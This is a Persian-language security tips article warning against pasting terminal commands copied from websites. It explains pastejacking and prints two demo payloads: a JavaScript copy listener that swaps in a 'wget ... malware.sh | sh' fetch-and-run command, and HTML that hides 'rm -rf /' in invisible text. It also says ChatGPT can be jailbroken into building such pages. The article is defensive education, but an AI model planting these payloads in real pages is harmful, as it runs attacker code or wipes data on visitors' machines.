خبر و ترفند روز

خبر و ترفند های روز را اینجا بخوانید!

چرا نباید دستورات را از اینترنت کپی کنید؟

ارشیا یوسفی ادیب ۸ شهریور, ۱۴۰۲ 4 min read

وسوسه شده اید که یک دستور را بصورت آنلاین کپی کنید؟ دوباره فکر کن.

از کامپیوتر گرفته تا تلفن همراه، کپی پیست در همه جا رایج است. این کار زندگی را آسان تر می کند و در وقت شما صرفه جویی می کند زیرا نیازی به تایپ دستورات طولانی یا متون اضافی ندارید. با این حال، اگر به اندازه کافی مراقب نباشید، می توانید به سادگی با دستورات کپی پیست در ترمینال رایانه خود هک شوید.

بیایید بیاموزیم که چگونه کپی و چسباندن می تواند شما را هک کند و برای جلوگیری از آن چه کاری باید انجام دهید.

چرا نباید دستورات را کپی-پیست کنید؟

چه در استفاده از خط فرمان تازه کار باشید یا یک کهنه کار با تجربه باشید، ممکن است وسوسه شوید که دستورات را از اینترنت کپی پیست کنید تا در وقت خود صرفه جویی کنید و کار واقعی را انجام دهید. با این حال، باید توجه داشته باشید که سایت‌های مخرب در واقع جعبه‌های کد را به سلاح تبدیل می‌کنند تا هر زمان که دستورات را مستقیماً در ترمینال کپی-پیست کنید، کدهای مخرب را تزریق می‌کنند.

این بازیگران مخرب از ترفندهای مختلف frontend برای پنهان کردن دستورات مخرب در پشت کدهای بی ضرر استفاده می کنند.

دستوری مانند sudo apt-get update && apt-get upgrade معمولاً باید مخازن را به روز کند و بسته ها را در یک سیستم لینوکس ارتقا دهد. با این حال، اگر اطلاع ندارید و این دستور را مستقیماً در ترمینال خود کپی کنید، ممکن است ناآگاهانه کد بدافزار را با امتیازات ریشه به دلیل پیشوند sudo اجرا کنید.

مطلب مرتبط:   7 اشتباه امنیتی ساده ای که هم اکنون مرتکب می شوید

در بدترین حالت، این ممکن است منجر به تسخیر کامل سیستم شما یا حتی یک حمله باج افزار شود. اما، بازیگران تهدید چگونه این کار را انجام می دهند؟ چگونه می توان دستورات مخرب را در پشت کدهای بی ضرر پنهان کرد؟

نحوه عملکرد سوء استفاده از کد مخرب

PoC بهره برداری

این اکسپلویت را می توان با استفاده از جاوا اسکریپت هوشمندانه یا حتی HTML اولیه انجام داد. جاوا اسکریپت مکانیزمی به نام EventListener دارد. رویدادها اقداماتی هستند که می توانند در مرورگر اتفاق بیفتند، مانند کلیک کردن روی یک دکمه، ارسال فرم، حرکت ماوس، فشار دادن کلید، یا تغییر اندازه پنجره.

EventListener، همانطور که از نامش پیداست، برنامه وب شما را قادر می‌سازد تا به رویدادهای خاصی که توسط عملکرد کاربر ایجاد می‌شوند، واکنش نشان دهد. صفحات وب مخرب با ثبت رویدادی که کاربر در حال کپی کردن متن است و جایگزین کردن متن بی ضرر با کد مخرب از این مکانیسم مشروع و مفید سوء استفاده می کند.

در اینجا کد اصلی اکسپلویت مورد استفاده برای ساخت تصویر دمو آمده است:

<script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

در اینجا نسخه آزمایشی دیگری وجود دارد که به جاوا اسکریپت نیاز ندارد و از وانیلی HTML استفاده می کند:

<p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

این یک متن سفید نامرئی ایجاد می کند، به طور موثر دستور مخرب “rm -rf /” را پنهان می کند و تگ
یک خط شکسته ایجاد می کند به طوری که برخی از پایانه ها بلافاصله پس از چسباندن کد، کد را اجرا می کنند. ممکن است فکر کنید که برای انجام این حمله به مهارت های برنامه نویسی و توسعه وب نیاز است، اما در واقع، این کار در واقع بسیار آسان است.

مطلب مرتبط:   چگونه از نفوذ کرم ها به مک خود جلوگیری کنیم

حتی اگر مهاجم هیچ دانشی از جاوا اسکریپت یا توسعه وب نداشته باشد، می تواند به راحتی با استفاده از ChatGPT بدافزار ایجاد کند. با اعلان های مناسب، می توان به راحتی ChatGPT را جیلبریک کرد و آن را وادار به ایجاد صفحات وب مخربی کرد که از این ترفند استفاده می کنند.

چگونه می توانید از خود محافظت کنید

عکس تار از کدنویسی کامپیوتر آبی و بنفش

هیچ راه مشخصی برای محافظت از خود در برابر حملات کدهای مخرب وجود ندارد. مطمئناً، می‌توانید جاوا اسکریپت را برای سایت‌های مشکوک غیرفعال کنید، اما به دلیل ماهیت آنها، احتمالاً به شما اجازه نمی‌دهند بدون جاوا اسکریپت فعال باشد.

علاوه بر این، برای روش CSS (Cascading Style Sheets)، هیچ دفاع مشخصی در برابر دستورات مخرب وجود ندارد زیرا هنوز کد CSS معتبر است (یعنی هیچ ایرادی در آن وجود ندارد اما قصد هنوز مخرب است). بهترین راه برای محافظت از خود این است که از بهداشت اولیه اینترنت پیروی کنید و عقل خود را در مورد خود بدانید.

از پیوندهای ناشناخته بازدید نکنید و مطمئن شوید که همیشه دستوری را که از اینترنت کپی می کنید، قبل از چسباندن آن در ترمینال در یک ویرایشگر متن قرار دهید. به منابع کد قانونی و معتبر پایبند باشید تا مطمئن شوید که از کدهای مخرب در خط فرمان خود استقبال نمی کنید.

علاوه بر این، چند ترمینال مانند ترمینال xfce4 از پیش مجهز به حفاظت کپی-پیست هستند. به محض اینکه دستوری را در ترمینال خود بچسبانید، یک پاپ آپ نمایش داده می شود که دقیقاً به شما می گوید چه چیزی اجرا می شود. بررسی کنید که آیا ترمینال شما نیز مکانیزم مشابهی دارد و آن را فعال کنید.

مطلب مرتبط:   آیا این شماره یک کلاهبردار است؟ در اینجا نحوه بررسی است

اجرای کد مخرب بسیار خطرناک است

حتی اگر آنتی ویروس نصب کرده باشید، اشکال خاصی از اجرای کدهای مخرب همچنان می توانند به موانع محافظ دستگاه شما نفوذ کنند. به همین دلیل بسیار مهم است که مراقب کدهایی که به صورت آنلاین کپی می کنید باشید و تا جایی که ممکن است برای ایمن نگه داشتن خود از اقدامات محافظتی استفاده کنید.

Tags: